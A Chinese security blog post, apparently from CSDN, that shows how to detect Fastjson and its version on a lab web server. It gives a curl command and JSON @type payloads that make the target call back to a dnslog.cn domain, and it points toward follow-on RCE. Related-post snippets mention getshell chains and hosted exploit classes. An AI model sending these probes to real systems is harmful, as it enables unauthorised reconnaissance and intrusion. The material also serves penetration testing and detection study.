Fastjson漏洞的识别与DNSlog回显

tpaer

已于 2022-09-25 16:06:56 修改

阅读量4.6k

点赞数 1

分类专栏：从入门到入狱文章标签： json 网络安全 java web安全 web

于 2022-09-02 00:25:47 首次发布

本文链接：https://blog.csdn.net/qq_18980147/article/details/126653516

版权

从入门到入狱专栏收录该内容

49 篇文章 23 订阅

订阅专栏

Fastjson的探测方式

模拟使用fastjson的网站 http://192.168.88.111:8090/

方式一

命令行

curl http://192.168.88.111:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"cegkgu.dnslog.cn"}:0'

识别特征：（出现则使用了Fastjson）

"status":500, "error":"Internal Server Error"

在这里插入图片描述

Bp
识别特征：（出现则使用了Fastjson）
type=Internal Server Error, status=500

在这里插入图片描述

方式二

通过DNSlog回显
在这里插入图片描述 Bp

payload：识别1.2.67之前版本

{"tpa":{"@type":"java.net.Inet4Address","val":"cegkgu.dnslog.cn"}}

在这里插入图片描述
DNSLog成功回显

在这里插入图片描述 payload：识别1.2.67之后版本

{"@type":"java.net.Inet4Address","val":"cegkgu.dnslog.cn"}

其他同理，若不在版本范围会出现特征type=Internal Server Error, status=500，说明该页面使用了Fastjson但版本不符没有识别到。

总结

payload有很多种，测试使用DNSlog回显的方式就可以，能识别出Fastjson版本，若在版本范围内就可以继续进行RCE攻击。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

tpaer

关注关注

1
点赞
踩
7

收藏

觉得还不错? 一键收藏
3
评论
Fastjson漏洞的识别与DNSlog回显

Fastjson RCE漏洞实战POC探测方式
复制链接

扫一扫

专栏目录

35-3 使用dnslog探测fastjson漏洞

weixin_43263566的博客

04-10

457

DNSLog是一种记录在DNS上的域名相关信息的机制，类似于日志文件，记录了对域名或IP的访问信息。因特网采用树状结构的命名方法，按照组织结构划分域，每个域都是名字空间中被管理的一个划分，可以进一步划分为子域。当向DNS服务器发起kxsy.work的解析请求时，DNSLog会记录下此次解析，包括解析的域名和对应的IP地址。刷新dnslog服务器的记录，有记录就说明存在漏洞（一开始的4ax的子域名发送请求，刷新看不到，我就获取一个新的子域名做演示，所以下面的截图中的域名跟上一张不一样）将数据包发送到重发器。

FastjsonScan.jar 用于burp插件，扫描Fastjson漏洞

07-05

burp插件

3 条评论您还未登录，请先登录后发表或查看评论

代码审计-fastjson的dnslog探测方式分析

cdyunaq的博客

12-15

1874

前言正常测试的时候，发现java后端对json处理都会去测试一下是否存在反序列化，但是后端处理json的组件很多，比如fastjson、jackson、gson等，怎么判断是否使用了fastjson呢？有一个简便无危害的方式，就是通过dnslog来判断。大佬们讨论的issue 说明前面我们在分析的时候，会发现很多有一个变量token在进行判断，比如token == 12 或者 token == 14等，那这个token到底代表啥呢？在com.alibaba.fastjson.parser.

创新蓝队-针对DNSlog数据外带攻击的应急与预防

最新发布

Liyu_6618的博客

05-20

458

创新蓝队-针对DNSlog数据外带攻击的应急与预防

通过dnslog探测fastjson的几种方法

Adminxe的博客

05-04

7658

0x01 背景在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢？这就需要构造特定的payload了。昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类，于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的，我也在这次讨论中学习了很多。这篇...

【星落】Fastjson 漏洞复现

星星得不到爱火QAQ的博客

01-20

1015

Fastjson 是阿里巴巴的开源 JSON 解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。

Fastjson反序列化漏洞

g1345444的博客

02-19

989

下载地址：https://github.com/RandomRobbieBF/marshalsec-jar。下载地址：https://github.com/welk1n/JNDI-Injection-Exploit。下载地址：https://github.com/pmiaowu/BurpFastJsonScan。下载地址：https://github.com/a1phaboy/FastjsonScan。将TouchFile.java文件内容修改为以下代码。地址：http://www.dnslog.cn/

利用BCEL打fastjson直接burp回显getshell

2201_75353421的博客

08-03

1368

fastjson我曾经写过漏洞的原理，但是公网遇到的漏洞越来越少，大多都是在内网的环境，内网里没办法使用dnslog去探测回显。这里学习一下用bcel链直接在bp中产生回显进而getshell。

FastJson远程命令执行漏洞学习笔记

m0_73257876的博客

09-04

694

fastjson的漏洞其实就是fastjson autotype在处理json对象的时候，未对@type字段进行完全的安全性验证，攻击者可以传入危险类，并调用危险类中连接远程主机，通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误，请大家批评指正！

go post json 多维_使用DNSlog_GO实现快速检测FastJson

weixin_36254822的博客

12-10

216

Dnslog_Go原本是为了配合我的Httphook项目的一个子项目，目的是为了配合hk实现各种盲漏洞的探测，但是后来看到目前github上的各种dnslog项目都需要，安装各种依赖，于是就把这个项目加了web界面然后开源出来了。不了解的朋友，可以看我的这篇文章十分钟快速自建DNSlog服务器实际上dnslog主要还是为了配合各类脚本进行快速探测，web界面都是次要。为了方便大家使用，和...

Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

HEAVEN569的博客

06-21

1589

Fastjson 1.2.24 反序列化(CVE-2017-18349)漏洞复现

fastjson-c3p0:fastjson不出网回显利用

03-19

fastjson-c3p0 fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce

Fastjson反序列化复现

2301_77315080的博客

10-10

173

将Exploit.class文件和Exploit.java文件同时放在自己的vps上，并且在当前目录下使用如下命令开启一个轻量级的http服务。使用javac Exploit.java编译java文件生成Exploit.class。将如下代码保存为Exploit.java,代码中对应的vps地址换成自己的。生成一个dnslog并查看Dnslog，回显表示有漏洞。使用bp抓包，重发器更改抓包，GET改为POST包。发送json到目标服务器(<=1.2.24)Fastjson插件检测有漏洞。

Fastjson

N的博客

03-14

2264

Fastjson：我一路向北，离开有你的季节

fastjson与 jackson 黑盒如何辨别

把梦想放飞在蓝色的天空里...

11-25

839

from:某json 黑盒盲测与白盒审计 - 先知社区 (aliyun.com) fastjson与jackson区别，如果请求包中的 json 如下: {"name":"S", "age":21} 追加一个随机 key ,修改 json 为 {"name":"S", "age":21,"agsbdkjada__ss_d":123} 这里 fastjson 是不会报错的, Jackson 因为强制 key 与 javabean 属性对齐,只能少不能多 key, 所以会报错,服务器的响应包中多少会有异常.

Fastjson反序列化

可爱的我可爱的code

11-19

1186

欢迎去我的博客查看原文：http://www.xpshuai.cn/posts/21856/ 简介 fastjson 是阿里巴巴的开源JSON解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。可以通过反序列化导致远程命令执行。漏洞检测方法 DNSLog回显下面有多个请求，分别放到请求数据包部分(可能某个不适用, 多试几个)，通过构造DNS解析来判断是否是Fastjson，Fastjson在解析下.

fastjson框架漏洞复现

BING

10-23

2286

fastjson是阿里巴巴开源的json解析库，通常被用于java object和json字符之间进行转换,提供两个方法json.tojsonstring和json.parseobject/json.parse来分别实现序列化与反序列化。

fastjson漏洞流量特征

07-27

fastjson漏洞是指Fastjson这个Java的JSON库在处理恶意构造的JSON数据时存在安全漏洞，导致远程代码执行。由于Fastjson广泛应用于Java开发中，该漏洞威胁性较大。在网络流量中，可以通过以下特征来检测Fastjson漏洞： 1. Payload字符串：Fastjson漏洞利用的关键是构造恶意的JSON数据，其中包含特定的payload字符串。常见的payload包括类似于"\"@type\":\"com.xxx.XXX\""的字符串。 2. Fastjson版本：Fastjson漏洞存在于特定的版本中，可以通过识别请求或响应中的Fastjson版本号来判断是否潜在存在漏洞。 3. 异常堆栈：Fastjson漏洞触发时，通常会导致服务器端抛出异常。可以通过异常堆栈信息来判断是否存在Fastjson漏洞。 4. 请求方法和路径：Fastjson漏洞攻击通常会通过POST请求发送恶意JSON数据，因此可以通过检查请求方法和路径来筛选潜在的Fastjson漏洞攻击。需要注意的是，以上只是一些常见的流量特征，具体的流量分析还需要结合实际情况和使用的安全工具来进行综合判断。此外，及时更新Fastjson库到最新版本也是防范Fastjson漏洞的有效措施。